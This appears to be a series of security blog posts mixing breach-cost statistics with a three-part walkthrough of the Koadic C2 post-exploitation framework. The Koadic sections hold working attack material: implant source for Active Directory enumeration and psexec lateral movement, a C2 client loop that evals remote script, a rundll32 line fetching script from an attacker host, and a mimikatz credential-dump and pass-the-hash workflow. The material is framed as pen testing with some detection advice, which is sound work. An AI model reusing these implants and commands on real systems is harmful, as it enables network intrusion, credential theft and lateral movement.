As a sanity check for my dataset, I calculated the average cost of a health incident to be around $4.2 million. This is in the ballpark of Ponemon’s incident cost numbers — you can check the 2018 report for yourself. I can do more analysis of this curve, but let’s give ourselves a break.
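For the curious, the whole derivation fits in a few lines of Python. The regression coefficients below are placeholders (look up Jacobs’ published model for the real ones), and the input file of breached-record counts is hypothetical:

import numpy as np

A, B = 7.68, 0.76    # placeholder log-log intercept and slope, not Jacobs' exact fit

records = np.loadtxt("hipaa_record_counts.csv")   # hypothetical breached-record counts
costs = np.exp(A + B * np.log(records))           # regression cost estimate per incident

costs.sort()                                      # rank smallest to largest
print(f"average incident cost: ${costs.mean():,.0f}")
for q in (0.50, 0.90, 0.99):
    print(f"{q:.0%} of incidents cost <= ${np.quantile(costs, q):,.0f}")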

In short, if you’re a hospital or insurer and are hit with a breach, there’s a small chance you’ll really get whomped!

This is exactly the kind of information a hospital CEO would want to know! However, to derive a more practical answer, you’ll need to guesstimate the chances of your organization getting breached in the first place.

We’ll go over some of this again next time, and then try to work out a more complete argument to make to CEOs and boards to support buying data protection software.

If you want a homework assignment, review Evan Wheeler’s informative and strangely calming RSA presentations on cyber risk management. It’s a big subject with lots of variables and unknowns, but Evan breaks the problem into more digestible portions using the FAIR methodology. Bravo, Evan!

Continue reading the next post in "CEO vs. CSO Mindsets"

Koadic: Implants and Pen Testing Wisdom, Part III

One of the benefits of working with Koadic is that you too can try your hand at making enhancements. The Python environment with its nicely organized directory structures lends itself to being tweaked. And if you want to take the ultimate jump, you can add your own implants.

The way to think about Koadic is that it’s a C2 server that lets you deliver JavaScript malware implants to the target and then interact with them from the comfort of your console.

Sure, there’s a learning curve to understanding how the code really ticks. But I can save you hours of research and frustration: each implant has two sides, a Python shell (found in the implant/modules directory) and the actual JavaScript (located in a parallel implant/data directory).

To add a new implant, you need to code up these two parts. And that’s all you need to know. Well, not quite. I’ll get into some more details below.

So what would be a useful implant to aim for?

Having already experienced the power of PowerView, the PowerShell pen-testing library for querying Active Directory, I decided to add an implant to list AD members for a given group. It seemed like something I could do over a few afternoons, provided I had enough caffeine.

Active Directory Group Members a la Koadic

As I’ve been saying in my various blog series, pen testers have to think and act like hackers in order to effectively probe defenses. A lot of post-exploitation work is learning about the IT landscape. As we saw with PowerView, enumerating users within groups is a very good first step in planning a lateral move.

If you’ve never coded the JavaScript to access Active Directory, you’ll find oodles of online examples on how to set up a connection to a data source using the ADODB object — for example this tutorial. The trickiest part is fine tuning the search criteria.

You can either use SQL-like statements, or else learn the more complex LDAP filter syntax. At this point, it’s probably best to look at the code I cobbled together to do an extended search of an AD group.

// Open an ADO connection to Active Directory via the ADSI OLE DB provider.
var objConnection = new ActiveXObject("ADODB.Connection");
objConnection.Provider = "ADsDSOObject";
objConnection.Open("Active Directory Provider");
var objCommand = new ActiveXObject("ADODB.Command");
objCommand.ActiveConnection = objConnection;   // the command runs over this connection

Koadic.work.report("Gathering users ...");
// strDomain is defined elsewhere in the implant; Koadic replaces ~GROUP~ with the info field.
var strDom = "<LDAP://" + strDomain + ">";
// LDAP filter: user objects that are members of the target group.
var strFilter = "(&(objectCategory=person)(objectClass=user)(memberOf=cn=~GROUP~,cn=Users," + strDomain + "))";
var strAttributes = "ADsPath";

// Query format: <base>;filter;attributes;scope -- "Subtree" searches below the base.
var strQuery = strDom + ";" + strFilter + ";" + strAttributes + ";Subtree";

objCommand.CommandText = strQuery;

var objRecordSet = objCommand.Execute();
objRecordSet.MoveFirst();
var user_str = "";
while (!objRecordSet.EOF) {
    user_str += objRecordSet.Fields("ADsPath").value;
    user_str += "\n";
    objRecordSet.MoveNext();
}
Koadic.work.report(user_str);
Koadic.work.report("...Complete");

I wanted to enumerate the users found in all the underlying subgroups. For example, in searching Domain Admins, the query shouldn’t stop at the first level. The “Subtree” parameter above does the trick. I didn’t have the SQL smarts to work this out in a single “select” statement, so the LDAP filters were the way to go in my case.

I tested the JavaScript independently of Koadic, and it worked fine. Victory!

There’s a small point about how to return the results to the C2 console. Koadic solves this nicely through its own JS support functions. There’s a set of these that lets you collect output from the JavaScript and then deliver it over a special encrypted channel. You can see me doing that with the Koadic.work.report function, which I added to the original JavaScript code.

And this leads nicely to the Python code — technically the client part of the C2 server. For this, I copied and adjusted an existing Koadic implant; mine is called enum_adusers. You can view a part of my implant below.

import core.implant
import core.job   # the job base class lives here
import uuid

class ADUsersJob(core.job.Job):
    def done(self):
        self.display()

    def display(self):
        if len(self.data.splitlines()) > 10:
            self.shell.print_plain("Lots of users! Only printing first 10 lines...")
            self.shell.print_plain("\n".join(self.data.splitlines()[:10]))
            # Save the full listing to a loot file named by session IP plus a random id.
            save_file = "/tmp/loot." + self.session.ip + "." + uuid.uuid4().hex
            with open(save_file, "w") as f:
                f.write(self.data)
            self.shell.print_good("Saved loot list to " + save_file)
        else:
            self.shell.print_plain(self.data)

To display the output sent by the JavaScript side of the implant to the console, I use some of the Python support provided by Koadic’s shell class, in particular the print methods. Under the hood, Koadic is scooping up the data sent by the JavaScript code’s report function, and displaying it to the console.

By the way, Koadic conveniently allows you to reload modules on the fly without having to restart everything! I can tweak my code and use the “load” command in the Koadic console to activate the updates.

My very own Koadic implant. And notice how I was able to change the code on the fly, reload it, and then run it.

I went into detail about all this partially to inspire you to roll your own implants, but also to make another point. The underlying techniques that Koadic relies on — rundll32 and mshta — have been known to hackers for years. What Koadic does is make all this hacking wisdom available to pen testers in a very flexible and relatively simple programming environment.

Some Pen Testing Wisdom

Once you get comfortable with Koadic, you can devise your own implants, quickly test them, and get to the more important goal of pen testing — finding and exploring security weaknesses.

Let’s just say I’m really impressed by what Sean and Zach have wrought, and Koadic has certainly sped up my understanding of the whole testing process.

For example, a funny thing happened when I first went to try my enum_adusers implant. It failed with an error message reading something like this: “Settings on this computer prohibit accessing a data source on another domain.”

I was a little surprised.

If you do some googling, you’ll learn that Windows’ Internet security controls have a special setting to allow browser scripts to access data sources. And in my AWS testing environment, the Amazon overlords wisely made sure that this was disabled for my server instance — which, it should be noted, is certainly not a desktop environment. I turned it on just to get my implant pulling in AD users.

Gotcha! Enabling “Access data sources across domain” allowed my implant to work. But it’s a security hole!

Why was the JavaScript I coded for the Koadic implant being treated as if it were a browser-based script, and therefore blocked from making the connection to Active Directory?

Well, because technically it is running in a browser! As I mentioned last time, the Koadic scripts are actually executed by mshta, which is Microsoft’s legacy product for letting you leverage HTML for internal business apps.

The real pen testing wisdom I gained is that if this particular script runs, it means that the remote data source security control is enabled, which is not a good thing, even and perhaps especially on a server.

Next time, I’ll be wrapping up this series, and talk about defending against the kinds of attacks that Koadic represents — stealthy script-based malware.

Continue reading the next post in "Koadic Post-Exploitation Rootkit"

Master Fileless Malware Penetration Testing!

Our five-part series brings you up to speed on stealthy techniques used by hackers. Learn how to sneakily run scripts with mshta, rundll32, and regsvr32, scary Windows binaries that live in your System32 folder!

Continue reading the next post in "Living off the Land With Microsoft"

CEO vs. CSO Data Security Mindsets, Part I

If you want to gain real insight into the disconnect between IT and the C-levels, then take a closer look at the Cyentia Institute’s Cyber Balance Sheet Report, 2017. Cyentia was founded by the IOS blog’s favorite data breach thinker and statistician, Wade Baker. Based on surveying over 80 corporate board members and IT executives, Cyentia broke down the differing data security viewpoints between CSOs and the board (including CEOs) into six different areas.

The key takeaway is that it’s not just that IT doesn’t speak the same language as the business side, but also that the business executives and IT view and think about basic security ideas, values, and metrics differently. It’s important to get everyone on the same page, so I applaud Cyentia for their efforts.

The report and its findings were the inspiration — thanks, Wade — behind this IOS blog mini-series. It’s my modest attempt to bridge the viewpoint gap, and try to get everyone on the same page. (And after that I’ll take on world peace.)

In this first post, we’ll look at some of the Cyber Balance Sheet’s intriguing results and observations. In the second and third posts, I’ll attempt to act as couples counselor, and explain ideas that one side needs to know about the other.

When Worlds Collide

Let’s look first at one of the more counter-intuitive results that I discovered in the report.

Cyentia asked both CSOs and board subjects to rate the value of cybersecurity to their business in five different categories: security guidance, business enabler, loss avoidance, data protection, and brand protections (see chart below).

Source: Cyber Balance Sheet Report, 2017 (Cyentia Institute)

Yeah, I’m a little surprised that data protection was rated as valuable by under 30% of CSOs but over 80% of board members. Maybe I’m a crazy idealist, but you’d think that would be job #1 for CSOs!

The explanation from Cyentia on this point is worth noting: “CSOs of course know that data protection lies in their purview … and so they’ve learned to position data protection as a business enabler rather than a cost center.”

I think what Cyentia is getting at is that CSOs feel strongly that they bring real value to their business and not just red ink — they’re not just providing a data protection service. And that jibes with the fact that 40% of CSOs say they are business enablers, although that belief is not shared equally by the board: only 20% of them think that.

The key to all this is the difference in the breakdown on the “brand protection” value: over 60% of board members saw this as important, but it barely made a blip with CSOs, at less than 20%.

I’m not surprised that CSOs don’t see their job as being the brand police. I don’t necessarily blame them. I can almost hear them screaming “I’m an IT professional not a brand champion.”

But let’s look at this from a risk perspective, which is the viewpoint of CEOs and boards. As one of the board-level interviewees put it in the report, their biggest concern is the legal and business implications of a data breach. They know a data breach or an insider attack can cause serious reputational damage, leading to lost sales and lawsuits, which all work out to hard dollars. Brand damage is very much a board-level issue!

Ponemon, of course, has been tracking both the direct and enormous indirect costs involved in breach incidents with its own reports over the years, and recent news only adds to the evidence.

Cyentia has identified an enormous gap between what CSOs think is important versus the board regarding the value of cybersecurity. This leads nicely to another result of theirs, related to security metrics.

Let’s Talk About Risk

The metric measurements in the report (see section 4) are also revealing and detail more of this diverging viewpoint. Of course, CSOs are focused on various IT metrics, particularly related to security incidents, responses, governance, and more.

Now that’s a disparity! CSOs underplay the importance of risk. (Source: Cyentia Institute)

Cyentia tells us there’s an approximate balance between both sides for many of the IT metrics. However, there’s a large gap between CSOs and boards over the importance of “risk posture” metrics: it’s mentioned by 80% of boards versus only 20% of CSOs. That’s a startling disparity.

What gives?

IT loves operational security metrics: the ones mentioned above along with lots of details about day-to-day operations, involving patching status, malware or virus scanner stats, and more.

But that’s not what board members, who may not be as technically knowledgeable in a narrow IT sense, think is important for their work!

These folks have enormous experience running actual businesses. CEOs and their boards, of course, need to plan ahead, and these savvy business pros expect there to be uncertainty in their plans. That comes with the territory.

What they want from IT is a quantification of how bad the outcome of a breach, insider attack, or accidental disclosure can be in dollars, and the frequency or probability with which these events could happen.

You can think of them as disciplined high-tech gamblers who know all the probabilities of each outcome and place their bets accordingly. Pro tip: they’re probably great poker players.

For Next Time

If you want to get ahead of the game, take a look at Evan Wheeler’s presentation at this year’s RSA conference. Evan is a CISO and risk management expert. If you want to understand what a risk profile is, check out his explanation at around the 25-minute mark.

His key point is that business leaders are interested in both rare cybersecurity events that incur huge losses – think Equifax – and more likely events that typically have far lower costs – spam mail, say, used to get corporate credit card numbers in the travel department. They have different ways of dealing with each of these outcomes.

We’ll get a little more into the weeds next time when we look at “exceedance probabilities”, which are basically a more quantified version of a risk profile. It’s a great topic, and one that CSOs should become more familiar with.

There are other interesting stats in the Cyentia report – blow your mind by perusing the chart showing different perspectives on security effectiveness. I urge you to download it for yourself and spend time mulling over the fine points. It’s well worth the effort.


Continue reading the next post in "CEO vs. CSO Mindsets"

Koadic: Pen Testing, Pivoting, & JavaScripting, Part II

Mshta and rundll32, the Windows binaries that Koadic leverages, have long been known to hackers. If you take a peek at MITRE’s ATT&CK database, you’ll see that rundll32 has been the basis for attacks stretching over years. Pen-testing tools such as Koadic have formalized established hacking wisdom, thereby helping IT people (and bloggers) understand threats and improve defenses.

I’ll add that it makes sense to also take a deeper dive into Koadic’s design to gain even more insights into possible defense strategies. With that in mind, let’s go over a few ideas from last time.

Playing Pen Tester (and Blue Teamer)

We saw how Koadic, like all command-and-control (C2) servers, lets us send commands from its console to the targeted computer, on which a small-footprint JavaScript shell (more on that below) launches the actual Windows commands.

As a pen tester, one of the first things you want to learn is whether there’s interesting data that you can access and then copy or exfiltrate. For my pretend AWS environment, you can see below how I used legacy findstr to zoom into a file containing sensitive data.

I then used implant/util/download_file to bring it back home.

Switching to my “blue team” persona, let’s now take a quick look at the Windows Event logs.

To begin to understand what’s happening, I enabled very granular logging. I was doing this for educational purposes – and isn’t this what pen testing is about? – but you may not be able to depend on detailed logs in real-world post-exploitation analysis. However, as we’ll soon see, Koadic does leak information into the file world – it’s not completely fileless. And this provides an opening for a different kind of defense.

The first interesting log entry is one showing rundll32 pulling in a remote script – which I discussed back in my LoL series. This is not, clearing throat, a standard use of this utility, and should raise flags. By the way, Windows Defender (in Windows 10) can spot some of the dark uses of this LoL-ware.

And then a little further on in the log is this revealing entry:

This should raise suspicions: indirect execution of a command coupled with redirection of output.

Of course, this is the result of the findstr command that I previously sent to my zombie. The larger point is that it’s being run indirectly, via the launch of a cmd shell that then runs findstr. That’s what actually happens when you run a shell command within JavaScript: you use ActiveX to create a shell session and then pass it the command, something like this:

// Run a Windows command from JScript through the WScript.Shell COM object
var r = new ActiveXObject("WScript.Shell").Run("findstr /I private C:\\VIPs");


Did you notice the 1> and 2>&1 part of the command in the log entry? Those of us of a certain vintage immediately recognize that syntax from Unix/Linux: it directs standard output to a file and redirects standard error to standard output.

Sure, there are legit reasons for doing all this, but it’s also the way you would relay output from a command (launched by malware) back to the attacker’s server – save it to a file, read the file, and then delete it. This is in fact what Koadic does.
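To make that concrete, here’s a minimal JScript sketch of the relay pattern – run the command with its output redirected to a temp file, read the file back, then delete it. This is my own illustration of the technique, not Koadic’s actual code, and the scratch path is made up:

// Sketch of the save/read/delete relay pattern (illustration only, not Koadic's code).
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tmp = "C:\\Windows\\Temp\\out.txt"; // made-up scratch path

// Run the command via cmd, redirecting stdout and stderr to the temp file.
shell.Run("%comspec% /q /c findstr /I private C:\\VIPs 1> " + tmp + " 2>&1", 0, true);

// Read the captured output back, then delete the file.
var output = fso.OpenTextFile(tmp, 1).ReadAll();
fso.DeleteFile(tmp);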

Detailed event logging, though potentially containing useful information, may not always be available. But it doesn’t matter! If you can relate these short bursts of file creation and deletion activity with access to executable files that are rarely touched by the user, such as rundll32, and with the copying of files containing sensitive information, then you’re on the way to detecting and stopping an attack.

In short: there’s a little bit of file noise often generated by malware that can be detected by those security defenses that are capable of monitoring abnormal file activity on a user basis.

Real-World Pivots With Koadic

Last time, I began to show you how to configure Koadic for a lateral move or pivot. Let’s finish this up and do a real pivot.

Assuming there are other domain credentials available, Koadic provides the implant/inject/mimikatz_dynwrapx module to pull out the cached hashes and, when possible, actual passwords. If you then enter the creds command, you can reference the credentials using a numeric identifier.

With Koadic’s credential id number, I can pass the hash (or password) to psexec.

Let’s assume I’ve learned that masa is another server in the acme.corp domain, and that I’m using the credentials of the user named lex. I’m now ready to run implant/pivot/exec_psexec.

I set the pathname to the psexec executable, which I previously uploaded, provided the credid of lex’s credential, and, for the remote command to execute, supplied the same initial mshta stager that landed me on the victim’s computer. You leapfrog to the next computer by simply implanting another Koadic JavaScript client.

That should have been enough to get this started.

But … Koadic didn’t seem to properly pull the fully qualified domain name of the credential from the cache, so I had to tweak the JavaScript code. I was forced to override the cached domain information with whatever was explicitly configured through the set command.

My headaches didn’t end there: my lateral move was initially blocked. Psexec experts probably know this, but I learned the hard way that you have to provide the -h option for “elevated credentials” (even if you already have the plaintext password). More code changes.

Pivoting with Koadic: same mshta stager, different target.

On the bright side, Koadic’s script-based environment makes code updates relatively painless. Note to Sean and Zach: I think you need to take a closer look at the exec_psexec implant.

Once psexec runs successfully with the mshta payload, Koadic establishes another zombie. (Yes, that’s quite a sentence.)

I now had two zombies: one controlling pepper.acme.corp, my initial target, and a second one handling masa.acme.corp. I’m now a zombie master!

To communicate with the new zombie, I just needed to make sure I set the appropriate zombie number, and then run the command. You can see my zombie sorcery below:

I now control two zombies! How many can make that same boast?

Diving Into the Koadic Kode and Kraziness

I will be merciful and end this post soon enough! Before we break until next time, I wanted to start a dive into Koadic’s architecture. It’s helpful – I think – both for really understanding your pen testing and for gaining insights into real-world post-exploitation malware.

The one word that describes Koadic (and other malware creations) is obfuscatory. There’s nothing straightforward about the way it runs commands. Some of this is intentional, to throw off defenders, but C2 environments are also inherently complicated.

I’ll go into this in more detail next time, but here’s the $.10 tour.

The mshta stager that pulls in the initial payload doesn’t hang around very long. It then launches rundll32, which loads the main Koadic client code. At this point, the client is in a loop waiting for commands from the Koadic server – the client console that I showed above.
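As a quick refresher from the LoL series, the rundll32 incantation for pulling in a remote script looks something like the line below. The server address here is invented, and the exact quoting varies between variants:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://attacker.example.com/payload")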

Showing a small part of the client-side JavaScript pulled in by rundll32. You can see the code for launching a Windows command sent from the Koadic C2 server. Note the encasing HTA.

Once it receives a command, say to execute “ipconfig”, the client side of Koadic acts like a Unix/Linux shell – forking and execing commands. In our case, the Koadic client launches another rundll32 whose sole function is to connect back to the Koadic server and pull in specially served-up JavaScript – essentially the ActiveX code to launch a Windows shell session to run ipconfig. This child rundll32 is transient, exiting after it completes its single command and leaving the parent rundll32 to carry out the next ones.

Basta, for now!

If you’re looking for a homework assignment, you should study this section of the Koadic’s github. Hint: stdlib.js forms the core of the Koadic client.



Koadic: LoL Malware Meets Python-Based Command and Control (C2) Server, Part I

In my epic series on Windows binaries that have dual uses – talkin’ to you, rundll32 and mshta – I showed how hackers can stealthily download and launch remote script-based malware. I also mentioned that pen testers have been actively exploring the living-off-the-land (LoL) approach for post-exploitation. Enter Koadic.

I learned about Koadic sort of by accident. For kicks, I decided to assemble a keyword combination of “javascript rundll32 exploitation” to see what would show up. The search results led me to the Koadic post-exploitation rootkit, which according to its description “does most of its operation using Windows Script Host.” I was intrigued. By the way, Koadic is hacker-ese for COM Command and Control.

A good starting point for learning about Koadic is a Defcon presentation given by its two developers, Sean Dillon and Zach Harding. Koadic looks and acts like PowerShell Empire with script-based stagers and implants. The key difference, though, is that Koadic instead relies on JavaScript and VBScript on the victim’s computer.

As they note in their presentation, IT defenders are now more attuned to the fact that PowerShell can be used offensively. In other words, security teams are looking for unusual PS activity in the Windows event logs. They are not as focused (yet) on scripts run by the Windows Script Host engine. And that was some of the inspiration behind Koadic, which I suppose can be called JavaScript Empire.

Microsoft has also helped matters by adding PowerShell-only logging modules, a topic I explored in my amazing mini-series on obfuscation techniques.

Defenders can selectively turn on PS logging. They cannot do the same for JavaScript.

To log scriptware (other than PowerShell), Windows forces you to enable auditing of every process launched. Eeeks.

To analyze Koadic’s script activity, you have to bite the bullet and enable detailed logging, which results in an entry for each process launched in Windows. Let’s just say the Windows log ain’t a pretty place after that’s done, and this event fog helps hide Koadic’s activities.

Start Me Up With an Mshta Stager

Thankfully, I had malware analysis help from our amazing NYC-based summer intern, Daniel Vebman, who sanity checked my ideas and did some valuable exploring of his own.

In this first post, let’s take a shallow dive into Koadic’s capabilities and architecture. One of the major themes to keep in mind with Koadic is that its script-based approach gives the attackers the ability to change code on the fly, and adapt quickly to new environments.

How do you detect stealthy post-exploitation activities of Koadic-style attacks in the real world? I’ll come to that later on in the series, but clearly you’ll need to move beyond the Windows event log and, ahem, focus on the underlying file system.

To get started, we installed the software from Github on an Ubuntu instance in our AWS environment. We hit a few snags, but they were quickly solved by the ever-resourceful Daniel, who reinstalled Koadic’s Python modules (and did it right).

Yes, the server-side of Koadic is Python-based.

To do its work, Koadic leverages Windows binaries that sneakily pull in remote JavaScript or VBScript – essentially the ones I covered in my living-off-the-land series: mshta, rundll32, and regsvr32. It appears from reading the notes, though, that only mshta works, so that’s the stager we used in our testing.

Let’s assume the mshta stager was delivered to a victim via, say, a phish mail. Once activated, Koadic then creates a “zombie”. It’s their way of saying it has control over the victim’s machine. The zombification — it’s a word — is accomplished through a library of JavaScript-based implants.

Night of the Koadic Zombie!

In a realistic pen-testing scenario, the first task is to answer the who and where questions. After all, the payload has landed somewhere on the laptop or server of a random user in the Intertoobz.

Koadic’s implant/manage/exec_cmd does as advertised: lets you run individual shell commands remotely. As with all the implants, you enter the “info” command to see what the basic parameters are and then set them accordingly.

Who am I? Where am I? All of life’s – and a pen tester’s – basic questions can be answered by running shell commands remotely.

For exec_cmd, I had my zombie execute whoami, hostname, and ipconfig on my pretend victim’s computer – a Windows Server 2012 instance in my AWS environment.

Let’s Look Around

Once you have the basics, it’s then helpful to discover the fully qualified domain name (FQDN) of the Windows environment you’ve landed in. As we’ll see, you’ll need the domain name to move off the initially hacked computer.

For that I need to resort to PowerShell, setting the cmd parameter to GetHostByName($env:computerName). It’s a benign PS call, so in theory it shouldn’t raise any eyebrows if it’s logged.

Getting the domain name through a PowerShell cmdlet.

What about scanning the network to learn about IP addresses?

That’s where implant/scan/tcp comes into play. There’s also the implant/gather/user_hunter  to discover users who are currently logged in.

In short: Koadic has built-in support for getting essential environmental information and, of course, the ability to run shell commands to fill in the gaps. By the way, a description of all its commands can be found on the Github home page.

Doing the Psexec Pivot

Unless a hacker is very lucky and lands on a server that has millions of unencrypted credit card numbers, she’ll need to leapfrog to another computer. The way this is done is to harvest domain-level credentials, eventually find one that has elevated permissions, and then perform a lateral move.

Once upon a time, I wrote about how to use mimikatz and psexec to do just that. Koadic conveniently provides a mimikatz-based implant to retrieve credentials from LSASS memory and another one to support psexec. Small quibble: you have to explicitly upload the psexec executable to the victim’s computer and set the path name.

For example, to retrieve credentials I ran implant/inject/mimikatz_dynwrapx:

Koadic’s mimikatz dll shows NTLM hashes and even the password, thanks to the wdigest security hole.

You can see the NTLM hashes, which you can crack offline if need be. But because of the infamous wdigest security hole, you also get the plain text passwords. Eureka!

I won’t show how to do an actual lateral move or pivot in this post, but you can see the setup for the implant/pivot/psexec below:

By the way, you get the credid number from the creds command. It will automatically PtH for you!

I’ll explain next time how to do a real-word pivot by filling in the cmd parameter with the initial mshta stager, thereby creating another zombie. The idea is to continue the pattern of harvesting credentials with mimikatz and then pivoting. Yeah, you end up controlling an army of zombies. Evil!

A Little JavaScript Plumbing

That’s the quick $.50 tour of Koadic. One last bit of business is a high-level view of the architecture.

Koadic is essentially a remote access trojan or RAT. Nowadays, we give it the fancier name of a command and control (C2) server. In any case, the principles are easy enough to grasp: the client side executes the commands from the remote server.

In the case of Koadic, the client side is not a binary – as it was for the early RATs – but instead 100% JavaScript. The client’s sole function is to loop and pull in remote implants – written in either JavaScript or VBScript – from Koadic’s Python-based server, run them, and send the results back.
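Here’s the general shape of such a script-based client, as a heavily simplified sketch. To be clear, this is not Koadic’s actual code – the endpoint, transport, and timing are all invented:

// Skeleton of a script-based C2 client (illustration only, not Koadic's code).
var http = new ActiveXObject("MSXML2.XMLHTTP");

while (true) {
  http.open("GET", "http://c2.example.com/job", false); // synchronous poll
  http.send();

  if (http.status == 200 && http.responseText.length > 0) {
    try {
      eval(http.responseText); // run whatever script the server sent back
    } catch (e) {
      // a real client would report the error back to the server
    }
  }

  WScript.Sleep(5000); // works under WSH; a rundll32-hosted client needs another way to wait
}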

By the way, there’s some clever programming in Koadic wherein the server-side Python crafts the actual JavaScript implant. I’ll get into more details further on in the series.

Let me draw back the curtain to remove some of the mystery around the implants. Here’s the raw JavaScript in Koadic that actually launches psexec:

try
{
    var rpath = "~RPATH~";
    var UNC = "~RPATH~\\psexec.exe ";
    var domain = "~SMBDOMAIN~";
    var user = "~SMBUSER~";
    var pwd = "~SMBPASS~";
    var computer = "\\\\~RHOST~ ";

    // build the psexec command line: \\host -u "domain\user" -p password
    UNC += computer;

    if (user != "" && pwd != "")
    {
        if (domain != "" && domain != ".")
        {
            user = '"' + domain + "\\" + user + '"';
        }

        UNC += "-u " + user + " -p " + pwd + " ";
    }

    UNC += " -accepteula ~CMD~";

    // crappy hack to make sure it mounts
    var output = Koadic.shell.exec("net use * " + rpath, "~DIRECTORY~\\~FILE~.txt");

    if (output.indexOf("Drive") != -1)
    {
        var drive = output.split(" ")[1];
        Koadic.shell.run("net use " + drive + " /delete", true);
    }

    // run psexec via cmd.exe (%comspec%), hidden window, wait for completion
    Koadic.WS.Run("%comspec% /q /c " + UNC, 0, true);

    Koadic.work.report("Complete");
}
catch (e)
{
    Koadic.work.error(e);
}


Yeah, those tilde-encased variables are replaced with the real thing before the script is shipped off to the target system.

The key point is that this is a flexible environment. In fact, this infosec blogger (and former UNIX programmer) successfully made a few tweaks to the psexec data module to get it to work in our AWS environment.

Note to Sean and Zach: I think there are issues in the way a fully qualified domain name is parsed by the mimikatz implant. Just sayin’.

For Next Time

I’ll cover this material again, and I’ll do an actual psexec pivot and get deeper into my pen-testing persona. I’ll also analyze the events produced by Koadiac so that we can see that it ain’t so easy to detect unusual activity from the raw logs.

One last thought: wouldn’t it be great for pen-testing purposes if we were able to wangle Koadic into pulling in Active Directory information, say domain groups and their members? Kind of like what PowerView does.

Hold that thought, and next time we’ll also start on the task of creating our own implants. In the meantime, if you want to get ahead of the curve, you might want to study the Koadic modules in Github.


Ponemon and NetDiligence Remind Us Data Breach Costs Can Be Huuuge!

Those of us in the infosec community eagerly await the publication of Ponemon’s annual breach cost analysis in the early summer months. What would summer be without scrolling through the Ponemon analysis to learn about last year’s average incident costs, average per record costs, and detailed industry breakdowns? You can find all this in the current report. But then Ponemon did something astonishing.

The poor souls who made it through my posts on breach cost stats learned that the datasets used here are not normal. I mean that literally: they don’t correspond to a standard normal or bell curve. We also know from more in-depth studies that the data points are skewed with “heavy tails”, and are more accurately represented by power laws.

What does that have to do with Ponemon’s cost analysis?

Ponemon has avoided the issues of dealing with skewed data by lopping off the outliers — they don’t look at breach incidents above 100,000 records. Sure, you lose some information, but then the stats are more meaningful to the companies — most of them — that don’t live in the long tail of the curve.

Monster Breaches Are Costly. Very Costly.

Brace yourself. For 2018, Ponemon started looking at the dragon’s tail. They’ve included an analysis of mega data breaches involving incidents of over one million records.

First, let’s get the bad news out of the way. Since Ponemon only had 11 companies in their mega breach sample, they had to perform, gulp, a Monte Carlo analysis. That’s a fancy of way saying they were forced to make some guesses about a few of the parameters in their model, so they are randomly “sampled” to generate them.

The more important point is that in their graph below of breach costs vs. records stolen, the data points show a sub-linear (or, more technically, log-linear) relationship – the costs grow slower than a straight line. Double the number of records stolen, and the total breach cost is less than double.

Breach costs grow slower than a straight line. (Source: Ponemon, 2018)

And that’s exactly what other researchers have seen with breach costs. I also pointed this interesting factoid out in my breach cost series — you can learn more here.

For CFOs and CIOs, there’s a drop of good news in this slow-growing curve. It means that the cost per record drops as more records are involved.

For a data theft of 20 million records, the graph above indirectly tells us the average cost is about $18 per record, and at 50 million records, the per record cost decreases to about $7.
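To make the sub-linear idea concrete, here’s a toy power-law model in JavaScript. The constant and exponent are invented – they are not Ponemon’s fitted parameters – but any exponent below 1 produces the same effect: double the records, and the total cost grows by less than double, so the per-record cost falls.

// Toy sub-linear cost model: total(n) = a * n^b with b < 1.
// The constants are invented, not Ponemon's actual fit.
var a = 60000, b = 0.5;

function totalCost(records) { return a * Math.pow(records, b); }
function perRecord(records) { return totalCost(records) / records; }

console.log(perRecord(20e6).toFixed(2)); // ~13.42 dollars per record
console.log(perRecord(40e6).toFixed(2)); // ~9.49 – double the records, lower unit cost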

I suppose that may sound benign when quickly said in a presentation, but on the other hand … the total cost for a 50 million record theft is over $350 million.

And that’s something no board of directors wants to hear!

NetDiligence: Real-World Verification

While Ponemon’s theoretical analysis of mega breach costs is interesting, there is a dataset that sheds more light on real-world costs of these huge breaches. This comes to us courtesy of NetDiligence, a data risk analysis firm that has obtained access to actual claims data processed by cyber-insurance companies.

I looked at NetDiligence’s latest report, covering the 2014–2017 period. It provides further validation that data breach costs at the high end are, indeed, expensive.

According to NetDiligence, the average breach cost for the 591 claims in their dataset was about $394,000. They also calculated a median cost of a mere $56,000. Hmmm, with half the claims – roughly 295 of them – above $56K, there have to be monster incidents to explain the fact that the average is about seven times higher than the median. This is the sign of a non-normal dataset – the heavy-tailed curve that we typically see with breach stats.

I can do a quick back-of-the-envelope analysis to give you a better sense of mega costs lurking in the NetDiligence stats. Feel free to skip this next part if doing a multiplication with an average makes you slightly nauseous.

The total breach cost in the claims dataset is about $233 million (591 x $394,000). There’s a negligible amount of the total below the median – at most 296 x $56,000, or about $17 million. That leaves roughly $216 million in costs above the median, which is then spread out over 295 claims. That means the upper half has an average cost of at least $730,000.
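If you’d rather let the machine do the arithmetic, here’s the same back-of-the-envelope bound as a snippet, using the NetDiligence figures quoted above:

// Back-of-the-envelope bound on the average cost of above-median claims.
var claims = 591, mean = 394000, median = 56000;

var total = claims * mean;                     // ~ $233 million in total costs
var belowMax = Math.ceil(claims / 2) * median; // below-median claims cost at most this
var aboveAvg = (total - belowMax) / Math.floor(claims / 2);

console.log(Math.round(aboveAvg));             // at least ~ $730,000 per claim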

If you make some other assumptions – similar to what I did here — you quickly get to breach incidents in the millions of dollars for the top percentiles.

Anyway, NetDiligence doesn’t give away too many details about individual breach incidents in their analysis. But further down in the report, they reference some of the extreme costs in their claims dataset. This shows up in a table that breaks down costs by business size.

There are some monster incidents hidden in this table: $11 million, $15 million, and $16 million. (Source: NetDiligence)

If you look at the “Max” column, you can see that there are several incidents above $10 million. That ain’t chicken feed.

One Last Thing

It’s worth mentioning that Ponemon also includes indirects costs for incidents, which is based heavily on customer churn. This cost doesn’t show up in the cyber insurance claims because it’s based on hard costs —  legal fees, fines, credit monitoring, remediation efforts, etc.

In other words, Ponemon’s incident cost analysis will always trend significantly higher than the numbers from actual insurance claims. Ponemon’s cost numbers, though, are probably closer to the real-world cost, particularly for larger companies – and especially for public companies, where breach incidents can affect overall valuations. For example, Yahoo.

The key takeaway is that the headline-making breach incidents (Equifax, Yahoo, etc.) tell us about the very far end of the cost tail. The NetDiligence report in particular shows that there are still expensive data breaches, in the tens of millions of dollars, living in the middle of the tail. And these are likely less publicized, and more typically experienced.

I’ll have more to talk about for both the Ponemon and NetDiligence reports in a future post.